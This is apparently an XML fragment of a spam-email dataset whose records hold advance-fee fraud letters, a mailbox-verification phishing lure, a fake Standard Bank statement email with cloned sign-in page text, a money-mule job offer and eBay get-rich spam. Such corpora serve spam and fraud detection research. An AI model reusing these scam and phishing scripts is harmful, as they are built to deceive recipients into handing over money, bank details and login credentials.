    <t>Tue, 09 Nov 2004 15:38:35 -0300</t>
  </si>
  <si>
    <t>thomasreardon &lt;rea@velocall.com&gt;</t>
  </si>
  <si>
    <t>URGENT ASSISTANCE</t>
  </si>
  <si>
    <t>\n&gt;From Mr. Thomas Reardon,\nDear Friend,\nGreetings to you and your family in the name of God.I\nam personally contacting you in my search \nfor a reliable and God fearing person and having\ngotten your contact through prayers and \npainstaking efforts I have decided to seek your help\nin carrying out my last wish .My name is Thomas Reardon,\n 55 yrs old and  an American national who\nlived in Iraq. Until recently I had investments in oil\nand construction in Baghdad. Since the war started in\nthis country my life has been thrown into severe\nmystery. I lost my wife and two children to bombs\ndropped in the city. Today, Im in a hospital in China\nwith very fatal injuries and I have lost my ability to\ntalk. My doctors have indicated that my chances of\nsurvival are very slim. I have therefore decided that\npart of my fortunes should be distributed to charity\nworks to help victims of the war in sudan, iraq and\nother war zones and the rest part held in trust by you\nand use in  future for charity purpose. Before this\nhappened my business and concern for making money was\nall I lived for. \nI never really cared about other values in life. But\nsince the loss of my family, I have found a  new\ndesire to assist helpless families and victims of\nhumanitarian crisis. Shortly after the first gulf war\nI deposited the sum of  USD$8.5 million dollars  with\na financial company in Europe,given the complete ruin\nand disorder in the country I have no knowledge of any\nrelative who would be available to help me carry out\nthis last wish.  Please I want you to help me collect\nthe deposit  from the company in Europe and distribute\nit accordingly. I want you to use your discretion and\njudgement to re-emburse yourself at the end of the day\nfor  all expenses you will incure during the\ncollection and distribution of funds. If you are\nwilling to help, please reply as soon as you can so we\ncan look at your reward and the things you need to do\nto collect the money.\nLastly, A list of this orgainization you intend to\ndistribute this funds to will be highly appreciated.\nUpon your reply I shall send you the certifiate of\ndeposit and ownership certificate that was issued at\nthe time I deposited the Funds with them. I will also\nbe sending to you my international passport upon your\nreply.\nMay the good God bless you and your family. \nEndeavour to reply through my secured email address;\n(thomasreardon@myway.com)\nThanks/ Regards.\nThomas Reardon,\n\n\n___________________________________________________________________________\nMensaje enviado por servicio WebMail - [URL]http://federacionsuizoarg.com.ar[/URL]\n\n\n</t>
  </si>
  <si>
    <t>http://federacionsuizoarg.com.ar</t>
  </si>
  <si>
    <t>2070</t>
  </si>
  <si>
    <t>To: nan\nFrom: Anita Mrs &lt;anitahamberg2@virgilio.it&gt;\nDate: Tue, 09 May 2006 14:37:51 +0100</t>
  </si>
  <si>
    <t>Tue, 09 May 2006 14:37:51 +0100</t>
  </si>
  <si>
    <t>Anita Mrs &lt;anitahamberg2@virgilio.it&gt;</t>
  </si>
  <si>
    <t>MS. ANITA</t>
  </si>
  <si>
    <t>DEAR \n\n I am Mother Anita Smith Hamberg from Holland. I am married to \nLate Engr. Evans A.Hamberg, a German who worked with Julius Berger \nconstruction company in Africa.(a famous construction company) many \nyears,before he died in the 27th January 2002 bomb blast in Lagos at \nour Ikeja resident on his way to work.\n\nWe were married with two \nLovely \nchildren (Jerry and Cynthia) who were victims of the December \n17 \nSosoliso plane crash website: [URL]http://212.58.226.40[/URL]\n/1/hi/talking_point/1787000.stm\n\nhttp://www.onlinenigeria.\ncom/photos/displayimage.php?album=23&amp;pos=3&gt;\nAnd presently I am 54 \nYears \nold. When my late husband was Alive he deposited the sum of \n$12Million \nUSD. (Twelve million US dollars) with a Securities Company.\n\nPresently \nthis money is still with the Securities Company and the \nmanagement just \nWrote me as the beneficiary to come forward to receive \nthe money or \nrather Issue a letter of authorization to somebody to \nreceive it on my \nbehalf if I cannot come over. \n\nSo my reason of \ncontacting you is to \nknow if you will honest with me in other that I \ncan authorize you to \nmake this claims as my late husband co partiner, \nAll details will be \ngiven to u as soon as I receive your response.\n\nYours truly,\nMs. Anita Hamberg\n\nN/B I am presently in a hospital where \nI have been undergoing \ntreatment Cancer of the lungs.\nI await your \nurgent reply.\n\n\n</t>
  </si>
  <si>
    <t>http://212.58.226.40</t>
  </si>
  <si>
    <t>1297</t>
  </si>
  <si>
    <t>To: Recipients &lt;statement@standardbank.co.za&gt;\nFrom: Standard Bank &lt;statement@standardbank.co.za&gt;\nDate: Tue, 09 Mar 2021 20:45:18 -0800</t>
  </si>
  <si>
    <t>Tue, 09 Mar 2021 20:45:18 -0800</t>
  </si>
  <si>
    <t>Standard Bank Account eStatement 2021-03-10</t>
  </si>
  <si>
    <t>Dear Customer   Please find your electronic statement for May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 and we will effect the change within thirty (30) days of receipt of your instruction.    To open your eStatement, you will need Adobe Acrobat software (free to download from adobe.com). Regards,  Standard Bank 	  	    For any queries please  call us on 0861201311 Our lines are open from 8am to 9pm Monday to Friday and 8am to 4pm on weekends  and public holidays.             Copyright Standard Bank. All rights reserved. The Standard Bank of South Africa Limited (Reg. No. 1962/000738/06). Authorised financial services provider. Registered credit provider NCR CP15. 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 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 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 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 For more information about Standard Bank Group Limited see [URL]www.standardbank.co.za[/URL]    Dear Customer Please find your electronic statement for May attached. To keep your financial information safe, please note the following:  Information that only you will know is displayed in the eStatement verification block. This is done so you can be sure your statement is from Standard Bank.  If any of the information in this eStatement is incorrect, please contact us immediately on 0861 201 311.  You will be prompted with your security features to access your eStatement.  If you do not wish to receive your eStatement by e-mail, you must advise us in writing;and we will effect the change within thirty (30) days of receipt of your instruction.  To open your eStatement, you will need Adobe Acrobat software (free to download from adobe.com).Regards, Standard Bank   For any queries please call us on 0861201311Our lines are open from8am to 9pm Monday to Fridayand 8am to 4pm on weekends and public holidays.  Copyright Standard Bank. All rights reserved.The Standard Bank of South Africa Limited (Reg. No. 1962/000738/06). Authorised financial services provider.Registered credit provider NCR CP15.The Standard Bank email disclaimer and confidentiality note: This email, its attachments and any rights attaching hereto are, unless the context clearly indicates otherwise, the property of the Standard Bank Group Limited and/or its subsidiaries ("the group"). It is confidential, private and intended for the addressee only.Should you not be the addressee and receive this email by mistake, kindly notify the sender, and delete it immediately. Do not disclose or use the email in any manner whatsoever. Views and opinions expressed in this email are those of the sender unless clearly stated as those of the group.The group accepts no liability whatsoever for any loss or damages - whatsoever and howsoever incurred - or suffered resulting or arising from the use of this email or its attachments. The group does not warrant the integrity of this email nor that it is free of errors, viruses, interception or interference.The group will never send you any email or other communication asking you to update or confidential information about you or your account. If you have any doubts about the legitimacy of this email or other emails you receive claiming to be from Standard Bank please forward them to phishing@standardbank.co.zaFor more information about Standard Bank Group Limited see [URL]www.standardbank.co.za[/URL]  ï»¿ Standard Bank Online Banking AutoShare/Tax Free Invest Do you want to link your account to your profile? yes no Sign out                   Hello!                                   We've enhanced the sign in feature on our new, fresh Online Banking site.                 Your password has been successfully changed. Sign in Email address Please enter a valid email address By signing in you agree to the                                           T&amp;C'sLast updated on 5 July 2017                                                                                      Next                                                                                         Two steps to quick &amp; easy sign in:Start by entering your email, then your password.                                            Register for online banking                               Your password has been successfully changed.                                Sign in Email address Please enter a valid email address                                        By signing in you accept the                                         terms and conditionsLast updated on 5 July 2017                                                                                Next                                          By signing in you accept the  terms and conditions Last updated on 5 July 2017                                                                                         Sign in                                            Register for online banking                               Received an online banking for business invitation?                                                              START HERE                                Customer Care 0800 222 050 International +27 10 249 0070 These details donât seem to be right. Please check and try again                         Password Sign-In                                              Sign in                                                 {Curent_Email}                          Password Invalid Password                                 Forgot password?                                                              Sign in                                                                  Cancel                              South Africa 0860 123 000 International +27 11 299 4701 Email us at ibsupport@standardbank.co.za Standard Bank is a licensed                    financial services provider in terms of the Financial Advisory and                    Intermediary Services Act and a registered credit provider in terms of                    the National Credit Act, registration number NCRCP15.                 Loading ‐ please wait a moment Due to account inactivity you will be automatically signed out in  seconds. Continue banking? Continue Sign out</t>
  </si>
  <si>
    <t>311</t>
  </si>
  <si>
    <t>To: nan\nFrom: "Administrator" &lt;adminverification@idandwt.com&gt;\nDate: Tue, 09 Aug 2016 03:28:43 -0700</t>
  </si>
  <si>
    <t>Tue, 09 Aug 2016 03:28:43 -0700</t>
  </si>
  <si>
    <t>"Administrator" &lt;adminverification@idandwt.com&gt;</t>
  </si>
  <si>
    <t>Dear Account Owner</t>
  </si>
  <si>
    <t>Dear Account Owner,Your mailbox have exceeded 3.5 MB set by the administrator, you will not beable to send or receive mail except you re-verify your account by clicking on this link:[URL]http://www.smartsurvey.co.uk[/URL] and complete the required details andclick on submit.ThanksWeb-mail Administrator</t>
  </si>
  <si>
    <t>To: idrisumar94@go.com\nFrom: idris umar &lt;idrisumar94@go.com&gt;\nDate: Tue, 08 Jul 2003 18:52:12 -0700</t>
  </si>
  <si>
    <t>Tue, 08 Jul 2003 18:52:12 -0700</t>
  </si>
  <si>
    <t>idris umar &lt;idrisumar94@go.com&gt;</t>
  </si>
  <si>
    <t>idrisumar94@go.com</t>
  </si>
  <si>
    <t>Thank You.</t>
  </si>
  <si>
    <t>Attn: The President /ceo \n\nDear, \n\nBy way of introduction I am Mr.Idris Umar working in the credit and accounts department Union Bank of Nigeria Plc, Lagos, Nigeria. I write you in respect of a foreign customer with Domiciliary A/C number 6402356789. His name is Engineer Joseph Schultzman. He was among those who died in a plane crash here in Nigeria during the reign of late General Sani Abacha. \n\nSince the demise of this our customer, Engineer Joseph Schultzman, who was an oil merchant/contractor, I have kept a close watch of the deposit records and accounts and since then no body has come to claim the money in this a/c as next of kin to the late Engineer. He had only $38.5mllion in his a/c and the a/c is coded. It is only an insider that could produce the code or password of the deposit particulars. As it stands now, there is nobody in that position to produce the needed information other than my very self considering my position in the bank. \n\nBased on the reason that nobody has come forward to claim the deposit as next of kin, I hereby ask for your co operation in using your name as the next of kin to the deceased to send these funds out to a foreign offshore bank a/c for mutual sharing between myself and you. At this point I am the only one with the information because I have removed the deposit file from the safe . \n\nBy this doing, what is required of you is to send an application laying claims of the deposit as next of kin to the late Engineer. I will need your full name and address, company or residential, so that i can computerize them to tally with next of kin column in the certificate of deposit. Finally I want you to \nunderstand that the request for a foreigner as the next of kin is occasioned by the fact that the customer was a foreigner and for that reason alone a local cannot represent as next of kin. When you contact me, then we shall discuss on how the money will be split between us. \n\nTrusting to hear from you, I remain \n\nRespectfully yours, \n\nMr. Idris Umar. \n\nNB:FOR SECURITY REASONS PLEASE REVERT BACK TO ME VIA \nTHIS MY ALTERNATIVE MAILBOX:(idrisumar71@rediffmail.com) \nFIND MY CELL NUMBERS 234 80 33338093. \n\n\n\n\n\n\n\n\n\n\n___________________________________________________\nGO.com Mail                                    \nGet Your Free, Private E-mail at [URL]http://mail.go.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>1122</t>
  </si>
  <si>
    <t>To: researchers-owner@krusty.si.UM\nFrom: researchers-owner@krusty.si.UM\nDate: Tue, 08 Feb 2005 15:17:00 -0500</t>
  </si>
  <si>
    <t>Tue, 08 Feb 2005 15:17:00 -0500</t>
  </si>
  <si>
    <t>Researchers post from a_vlachko03@pro-alliance.info requires approval</t>
  </si>
  <si>
    <t>As list administrator, your authorization is requested for the\nfollowing mailing list posting:\n\n    List:    Researchers@lists.si.UM\n    From:    a_vlachko03@pro-alliance.info\n    Subject: APEX  TRUST\n    Reason:  Post by non-member to a members-only list\n\nAt your convenience, visit:\n\n    [URL]http://lists.si.UM[/URL]\n        \nto approve or deny the request.\n</t>
  </si>
  <si>
    <t>1119</t>
  </si>
  <si>
    <t>To: rbeaud@www.hismercies.com\nFrom: Robert Beaud &lt;robert.beaud@www.hismercies.com&gt;\nDate: Tue, 08 Feb 2005 12:59:07 +0000</t>
  </si>
  <si>
    <t>Tue, 08 Feb 2005 12:59:07 +0000</t>
  </si>
  <si>
    <t>Robert Beaud &lt;robert.beaud@www.hismercies.com&gt;</t>
  </si>
  <si>
    <t>rbeaud@www.hismercies.com</t>
  </si>
  <si>
    <t>Mutual Benefit</t>
  </si>
  <si>
    <t>\n\nDearest In Christ, \n\nIt is with Heavy Heart i am reaching you regarding the death of my \nlate client. I am Barrister Robert Beaud, the legal adviser to late \nMR. MIKE  &amp; CAROL HALL, a very Wealthy Couple that lived here in the \nUnited Kingdom, before their recent Death on the 26th of December \nduring the Tsunami disaster last year \n(2004).[URL]http://news.bbc.co.uk[/URL] these \ncouple served God as very dedicated Christians,they so dedicated their \nlife to God but they had no child till they died. They acquired a lot \nof landed properties like lands, Stocks/Bond,house properties, etc. As \ntheir legal adviser, before their death, the husband Mr. Mike  &amp; Carol \nHall instructed me to write his WILL because they had no child, they \ndedicated their wealth to God. \n\nAccording to the WILL, their assets should be given out to a ministry \nfor the work of God. As their legal adviser, all the documents for the \nassets that are deposited with the security company are in my care. He \ngave me the authority to give out the funds to the Ministries for the \nwork of God. As instructed by  MR. MIKE HALL before his death. As a \nmatter of fact the total amount of money that is contained in the two \ntrunk Boxes is $10,000,000.00 ,They did not want the management of the \nSecurity Company to know the content of the consignments, therefore \nthey registered the content of the consignments as Gold Bars. Now, the \nsecurity company believes that what They deposited with them were Gold \nBars. \n\nAs a born again Christian,I have been reading my bible and I have to \ndo what is lawful and right in the sight of God by giving out the fund \nto the chosen ministry for the purpose of God's work as instructed by \nthe owner before his death.After my fasting and prayers Today, I asked \nGod to make his choice and direct me to an honest Christian or the \nchosen ministry that deserves this fund by his Grace. I then came \nacross your address on the Internet as I was browsing through a \nChristian site.I appeal to you for the fund to be used wisely for \nthings that will glorify the name of God. I have just notified the \nSecurity Company where they deposited the consignments that contained \nthe fund, that I am moving the consignment abroad, and the security \ncompany is awaiting my authority to move the consignment out of the \nshores of my country. \n\nDear child of zion, if you know that you will use this fund honestly \nand wisely for things that will glorify God's name, then do contact me \nwith the above mentioned information via (rbeaud14@netscape.net) \nYour prompt response will be highly appreciated. \n\nYours in Christ. \n\nBarrister Robert Beaud. \n\n\n\n</t>
  </si>
  <si>
    <t>1120</t>
  </si>
  <si>
    <t>To: nan\nFrom: walter &lt;walter_companies_2005@linuxmail.org&gt;\nDate: Tue, 08 Feb 2005 09:36:51 -0500</t>
  </si>
  <si>
    <t>Tue, 08 Feb 2005 09:36:51 -0500</t>
  </si>
  <si>
    <t>walter &lt;walter_companies_2005@linuxmail.org&gt;</t>
  </si>
  <si>
    <t>Vacancy !!!</t>
  </si>
  <si>
    <t>\nWALTERS COMPANY \n\nFROM THE OFFICE OF THE MANAGER,\nWALTERS GATE COMPANY,\nIMPORT AND EXPORT,\nWORLD TRADE CENTER,\nLONDON,\nENGLAND.\n\nDear Sir/Madam,\n\n                      JOB OFFER FOR A REPRESENTATIVE.\n\nI am Mr. Walter Gate managing Director Walters Gate company and I am an engineer by profession, and my company is based in Europe.My Company deals with import and export, construction and general servicing. We import construction materials like Drilling machine, underground pipes, and pumping machine for refineries and general maintenance of petroleum refineries. We also supply materials for Borehole construction into America and Canada.Our offices are mainly in Europe and Asia.\n\nWe need a reliable and trustworthy representative that will monitor the \naffairs of our company in America and Canada, the representative will \nbe incharge of all the companies affairs like monitoring of goods to \ntheir various owners, clear from sea-port and also collect payment from \ncreditors.The company has agreed to let the representative have 10% of every payment collected as his/her commission.\n\n\nIf you are interested please send me the following information:\n\n1.Full Name.\n2.Full Contact addresses.\n3.Phone and Fax number.\n4.Date of Birth.\n5.Year of Working Experience.\n\n\nGet back to me with the information and your application will be \nprocessed and we will get back to you. For further information visit \nour:web-site [URL]www.walters-import-export.8m.com[/URL]\n\nContact us at: walter_comapnies_2005@linuxmail.org  or w_companies@linuxmail.org\n\nHave a blessed day. \n\nWalter gate. \n\n\n\n___________________________________________________________________________\nMail sent from WebMail service at Codyrock.Com\n- [URL]http://phpnuke.codyrock.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>www.walters-import-export.8m.com http://phpnuke.codyrock.com</t>
  </si>
  <si>
    <t>1121</t>
  </si>
  <si>
    <t>To: R@M\nFrom: Raymond Lauder &lt;rlauder210@yahoo.co.uk&gt;\nDate: Tue, 08 Feb 2005 09:17:47 -0800</t>
  </si>
  <si>
    <t>Tue, 08 Feb 2005 09:17:47 -0800</t>
  </si>
  <si>
    <t>Raymond Lauder &lt;rlauder210@yahoo.co.uk&gt;</t>
  </si>
  <si>
    <t>Assist Plz.</t>
  </si>
  <si>
    <t>Attention Plz., My name is Mr. R. Lauder, a member of Independent Committee of Eminent Persons (ICEP), Switzerland. ICEP is charged with the responsibility of finding bank accounts in Switzerland belonging to non-Swiss indigenes, which have remained dormant since World War II. It may interest you to know that in July of 1997, the Swiss Banker's Association published a list of dormant accounts originally opened by non-Swiss citizens. These accounts had been dormant since the end of World War II (May 9, 1945). Most belonged to Holocaust victims. The continuing efforts of the Independent Committee of Eminent Persons (ICEP) have since resulted in the discovery of additional dormant accounts - 54,000 in December, 1999. The published lists contain all types of dormant accounts, including interest-bearing savings accounts, securities accounts, safe deposit boxes, custody accounts, and non-interest-bearing transaction accounts. Numbered accounts are also included. Interest is paid on accounts that were interest bearing when established.  Note, the Claims Resolution Tribunal (CRT) handles processing of all claims on accounts due non-Swiss citizens. A dormant account of ORDNER ADELE with a credit balance of 35,000,000 US dollar plus accumulated interest was discovered by me. The beneficiary was murdered during the holocaust era, leaving no WILL and no possible records for trace of heirs. The Claims Resolution Tribunal has been mandated to report all unclaimed funds for permanent closure of accounts and transfer of existing credit balance into the treasury of Switzerland government as provided by the law for management of assets of deceased beneficiaries who died interstate (living no wills).  Being a top executive at ICEP, I have all secret details and necessary contacts for claim of the funds without any hitch. Through well-secured channels,I have the ability to flit away the funds into a bank in the Cayman Island, being a tax free, safe haven for funds of this nature.And to further obliterate any atom of trace to the fund, once in The Cayman Islands,I will relocate the funds to France through same well-secured established channel. Due to the sensitive nature of my job, I need a foreigner to HELP claim the funds from France. All that is required is for you to provide me with your details for processing of the necessary legal and administrative claim documents for transfer of the funds in your name.And we share the funds.  Kindly provide me with your full names, address, and telephone/fax. I will pay all required fees to ensure that the fund is transferred to France securely, from where you will be capable of accessing the funds gradually and transferring to your country and other banks of choice in the world. My share will be 60 percent and your share is 40 percent of the total amount. THERE IS NO RISK INVOLVED.  You can find additional information about unclaimed funds through the internet at the following websites:  [URL]www.swissbankclaims.com[/URL]  [URL]www.avotaynu.com[/URL]  [URL]www.icheic.org[/URL]  [URL]www.livingheirs.com[/URL]  [URL]www.wiesenthal.com[/URL]   The Holocaust Claims Processing Office has put funds in Escrow awaiting submission of valid claims for necessary disbursement. I find myself privileged to have this information and this may be a great opportunity for a life time of success without risks.  Due to security reasons, reply to me via email only on my alternative email id below.  ronlauder210@yahoo.co.uk   Thank you for your prompt response.  Lauder R.</t>
  </si>
  <si>
    <t>www.swissbankclaims.com www.avotaynu.com www.icheic.org www.livingheirs.com www.wiesenthal.com</t>
  </si>
  <si>
    <t>2683</t>
  </si>
  <si>
    <t>To: mohammed_hassan@latinmail.com &lt;mohammed_hassan@latinmail.com&gt;\nFrom: MOHAMMED HASSAN &lt;mohammed_hassan@latinmail.com&gt;\nDate: Tue, 07 Nov 2006 21:03:13 +0100</t>
  </si>
  <si>
    <t>Tue, 07 Nov 2006 21:03:13 +0100</t>
  </si>
  <si>
    <t>MOHAMMED HASSAN &lt;mohammed_hassan@latinmail.com&gt;</t>
  </si>
  <si>
    <t>mohammed_hassan@latinmail.com &lt;mohammed_hassan@latinmail.com&gt;</t>
  </si>
  <si>
    <t>URGENT REPLY NEEDED.</t>
  </si>
  <si>
    <t>FROM THE DESK OF MR.MOHAMMED HASSAN\nFOREIGN REMITTANCE DIRECTOR\nAFRICAN DEVELOPMENT BANK (ADB)\nOUAGADOU-BURKINA FASO\n\n\nDEAR FRIEND,\n\nTHIS MESSAGE MIGHT MEET YOU IN UTMOST SURPRISE,HOWEVER,IT'S JUST MY URGENT NEED FOR FOREIGN PARTNER THAT MADE ME TO CONTACT YOU FOR THIS TRANSACTION.\n\nI AM A BANKER BY PROFESSION FROM BURKINA FASO IN WEST AFRICA AND CURRENTLY HOLDING THE POST OF FOREIGN REMITTANCE DIRECTOR IN OUR BANK,AFRICAN DEVELOPMENT BANK(ADB).I HAVE THE OPPORTUNITY OF TRANSFERING THE LEFT OVER FUNDS ($25.5MILLION) OF ONE OF MY BANK CLIENTS. MR. ANDREAS SCHRANNER,WHO DIED ALONG WITH HIS ENTIRE FAMILY ON 31 JULY 2000 IN A PLANE CRASH,LIVING NOBODY BEHIND TO CLAIM HIS LEFT OVER FUND WITH MY BANK. \n\nYOU CAN CONFIRM THE GENUINESS OF THE DECEASED DEATH BY CLICKING ON THIS WEB SITE.\n\n[URL]http://news.bbc.co.uk[/URL]\n\nHENCE,I AM INVITING YOU FOR A BUSINESS DEAL WHERE THIS MONEY CAN BE SHARED BETWEEN US IN THE RATIO OF 40/60 IF YOU AGREE TO MY BUSINESS PROPOSAL,FURTHER DETAILS OF THE TRANSFER WILL BE FORWARDED TO YOU AS SOON AS I RECEIVE YOUR RETURN MAIL.\n\nHAVE A GREAT DAY.\n\nYOURS FIATHFULLY,\n\nMOHAMMED HASSAN\nFOREIGN REMITTANCE DIRECTOR\nAFRICAN DEVELOPMENT BANK (ADB).\n\n\n\n\n\n\n\n\n\n¡Miles de amigos con tus mismas aficiones! [URL]http://www.latinchat.com[/URL]\n\n¡Miles de amigos con tus mismas aficiones! [URL]http://www.latinchat.com[/URL]</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://www.latinchat.com http://www.latinchat.com</t>
  </si>
  <si>
    <t>2681</t>
  </si>
  <si>
    <t>To: nan\nFrom: jajasha_ ali0047 &lt;jajasha_ali0047@hotmail.com&gt;\nDate: Tue, 07 Nov 2006 18:14:13 +0000</t>
  </si>
  <si>
    <t>Tue, 07 Nov 2006 18:14:13 +0000</t>
  </si>
  <si>
    <t>jajasha_ ali0047 &lt;jajasha_ali0047@hotmail.com&gt;</t>
  </si>
  <si>
    <t>ATTN: HELPER.\n\n(STRICTLY CONFIDENTIAL)\nFROM THE DESK OF ( MR. JAJASHA ALI)\nAUDITING AND ACCOUNTING UNIT /FOREIGN REMITTANCE DEPT.\nAFRICAN DEVELOPMENT BANK (A.D.B)OUAGADOUGOU -BF\nREQUEST FOR THE URGENT TRANSFER OF THE SUM (US$10.5million) ONLY INTO YOUR \nACCOUNT.\n\nYou may be surprise to receive this message from me since you don't know me \nin person, but for the purpose of introduction., I got your impressive \ninformation through an international business equiry .\n\nBut I respectfully insist you read crefully as I am optimistic it will open \ndoors for unimaginable financial reward for both us.\nThis business transaction might not fall within the wide spectrum of your \nbusiness activities ,but I plead your assistance ,as your flair for \nprofitable business is needed .\n\nPermit me to introduce myself. I am MR. JAJASHA ALI. the Manager of auditing \nand accounting unit at the foreign remittance department of AFRICAN \nDEVELOPMENT BANK . In My department I discovered an abandoned sum of$ 10.5m \nUS dollars . In an account that belongs to one of our foreign customer who \ndied along with his entire family in november 2002 in a plane crash.\n\nSince I got information about his death, I have been expecting his next of \nkin to come over and claim his money because wecannot release it unless \nsomebody applies for it as next of kin or relation to the deceased \nanindicated in our banking guidelines but unfortunately I learnt that all \nhis supposed next of kin or relation died alongside\nwith him at the planecrash leaving nobody behind for the claim.\n\nIt is therefore upon this discovery that I and other officials in my \ndepartment now decided to make businness proposal to you and release the \nmoney to you as the next of kin or relation to the deceased for\nsafety and subsequent disbursement since nobody is coming for it and I don?t \nwant this money to go into the Bank treasury as unclaimed Bill.\n\nThe Banking law and guideline here stipulates that if such money remained \nunclamed after five years, the money will be transfered into the Bank \ntreasury as unclaimed fund.\n\nThe request of foreigner as next of kin in this business is occasioned bythe \nfact that the customer was a foreigner and a Burkinabe cannot stand as next \nof kin to a foreigner.\nI agree that 30 % of this money will be for you as foreign partner, \ninrespect to the provision of a foreign account, 10 %will be set aside for \nexpenses incured during the business and 60 % would be for me . There after \nI will visit your country with my family for disbursement according to the \npercentages indicated.\n\nTherefore to enable the immediate trnansfer of this fund to you as arranged, \nyou must apply first to the bank as relations or next of kin of the deceased \nindicating your bank name, your bank account number,\nyour private telephone and fax number for easy and effective communication \nand location where in the money will be remitted .\n\nOn your acceptance, I will send to the text of application by fax or by \nemail which you are going to apply to the bank ; and provide materials \nconfirmation references and inquiries regarding payment formalities from the \npayment Agency. I willbe handling official\nprotocols here and expect you to undertake international responsibilities as \nI am assuring you of a risk free transaction provided you display maturity.\n\nTherefore, if you are willing and interested to render\nthe needed assistance, endeavor to reply through my\nemail address .\n\nThanking you in anticipation of your kind considerations.\n\nYours sincerely.\n\nMR. JAJASHA ALI.\nTEL 00226 76 61 65 94\n\n_________________________________________________________________\nMSN Messenger : discutez en direct avec vos amis ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2682</t>
  </si>
  <si>
    <t>To: nan\nFrom: alhajisule@cmportal.com.ar &lt;alhajisule@cmportal.com.ar&gt;\nDate: Tue, 07 Nov 2006 15:49:47 -0300</t>
  </si>
  <si>
    <t>Tue, 07 Nov 2006 15:49:47 -0300</t>
  </si>
  <si>
    <t>alhajisule@cmportal.com.ar &lt;alhajisule@cmportal.com.ar&gt;</t>
  </si>
  <si>
    <t>\n\nDear Sir/Mandam,\n\nI greet you in the name of GOD, the Beneficent, and the Merciful. Before I \nintroduce myself, I wish to inform you that this letter is not a hoax mail \nand I urge you to treat it serious. We want to transfer fund to overseas \naccount the sum of ($30,000.000.00 USD)Thirty Million United States Dollars) \nfrom a Bank here in Nigeria West Africa. I want to ask you, If you are \ncapable to quietly provide either an existing bank account or to set up a new \nBank account immediately to receive this fund,even an empty account can serve \nto receive this fund,as long as you will remain honest to me till the end for \nthis important business,trusting in you and believing in God that you will \nnever let me down either now or in future.\nI am Patrick Duru,I WORK WITH FIDELITY BANK PLC During the course of our \nauditing last week, I discovered a floating fund in an account opened in the \nbank in 1997 and since 1999 till date, nobody has operated on this account \nagain, after going through some old files in the records I discovered that \nthe owner of the account died without a beneficiary to the account hence the \nmoney is floating and if I do not remit this fund out urgently it will be \nforfeited for nothing.\nThe owner of this account is Mr. Morris Thompson of 61, of Fairbanks, Alaska \nan American and a great industrialist,business leader and largest private \nland owner resident of Fairbanks City Alaska State who unfortunately lost his \nlife in the plane crash of Alaska Airlines Flight 261 which crashed, \nincluding his wife(Thelma Thompson)and only daughter(Sheryl Thompson)leaving \nnobody to claim the fund.\nNo other person knows about this account or any thing concerning it, the \naccount has no other beneficiary and my investigation proved to me as well \nthat the account is a secret account. The total amount involve is Thirty \nMillion United States Dollars only [$30,000.000.00]and I wish to transfer \nthis fund into a safe foreigners account abroad. But I don't know any \nforeigner; I am only contacting you as a foreigner because this fund cannot \nbe approved to a local person here, but to a foreigner who has information \nabout the account, which I shall give to you upon your positive response. I \nam revealing this to you with believe in God that you will never let me down \nin this business,you are the first and the only person that I am contacting \nfor this business. So, please reply urgently so that I will inform you the \nnext step to take urgently.\nI need your strong assurance that you will never let us down, me and a key \nbank official who is deeply involved with me in this business. I guarantee \nthat this transaction will be executed under a legitimate arrangement that \nwill protect you from any breach of the law. The bank official will destroy \nall documents of transaction immediately we receive this money leaving no \ntrace to any place. I will use my position and influence to obtain all legal \napprovals for onward transfer of this money to your account with appropriate \nclearance from the relevant ministries and foreign exchange departments.\nAt the conclusion of this business, you will be given 30% of the total \namount, 60% will be for me, while 10% will be for expenses both parties might \nhave incurred during the process of transferring.Furthermore, the transaction \nis Risk Free, there is no risk involved and the utmost paramount of this \ntransaction is Secret and Confidential due to my 15 years of meritious \nservice with the Fidelity Bank Plc.Which I dont want to  jeopardize.\nNote that,all correspondence should be by phone and by e-mail,I will be \nextremely happy if you can abide to my instructions, I believe the sky shall \nbe our limit and willing to invest in your area of specialization at the end \nof this transaction. Feel free to contact me directly via my email address or \ntelephone.\nThanks for your anticipated co-operation\n \nPatrick Duru\nFidelity Bank Plc\nPhone:2348026331325\n\n\nYou shall read more news about the crash on visiting this site;\n[URL]http://www.cnn.com[/URL]\n\n\n</t>
  </si>
  <si>
    <t>4779</t>
  </si>
  <si>
    <t>To: &lt;eo@dogma.slashnull.org&gt;\nFrom: cristopher@hotmail.com\nDate: Tue, 07 May 2002 07:34:50 -1600</t>
  </si>
  <si>
    <t>Tue, 07 May 2002 07:34:50 -1600</t>
  </si>
  <si>
    <t>cristopher@hotmail.com</t>
  </si>
  <si>
    <t>&lt;eo@dogma.slashnull.org&gt;</t>
  </si>
  <si>
    <t>eBay, How To Secure Your Financial Future And Increase Your Income                     23827</t>
  </si>
  <si>
    <t>\n\n**Would you li= ke to earn $750 a day using** **_ eBay_ ****and the\nInternet?**\n\n**You have received this e= mail for our free e-book "Secret$ of  _= e Bay_\nPowerSeller$" because you expressed an interest in making money with eBay\nand/or on the Internet.  \n  \nI absolutely - 100% - Guarantee you have ne= ver heard of this  _e Bay_ &amp;\nInternet money-making system before.  \n  \nThis _FREE_ no-strings attached e-book=  "Secrets of  _e Bay Powersellers" is\nso powerful, so compelling it will blow your mind!**\n\n**C lick here to  START YOUR JOU= RNEY! towards financial freedom ****  \n  \nMay 7th, 2002  \n  \nMark W. Monday -  _The _ _e B= ay_ _Millionaire_  \n  \nIn just a _few minutes_ reading my book, you = _will_ find an opportunity so\npowerful, so compelling, that you'll wonder why someone = hasn't thought of\nthis sooner!  \n  \nThis is _not a multi level marketing program_ or "Get rich quick= scheme".  It\nis a real business that can make you rea= lly _wealthy_.  \n  \nYou are about to journey to a wonderful pla= ce. A place where freedom from a\nboss, making you= r own rules and deciding your own destiny are par= amount. A\nplace that offers freedom with your time and a r= elief from the 9 to 5 stress\nlike you can't imagine!  \n  \nImagine yourself waking up in the morning, turning on your computer and fi=\nnding out that thousands of dollars had been deposited into your bank account.\nH= ow would that make you feel?  It is 100% possible when you know the secr=\nets to making money using eBay and the Internet.  \n  \nIf this idea turns you on, then so will this new e-Book  "Secrets of  _e B=\nay_ Powersellers"! Simply fill out the form located on our website and you\nwill receive via email this powerful money making e-book, absolutely FREE (You\nwill _instantly_ = receive your free e-book "Secrets of  _e Bay Powersellers"\nwithin a few seconds of placing your order).**\n\n**C lick here to  START YOUR JOU= RNEY! towards financial freedom ****  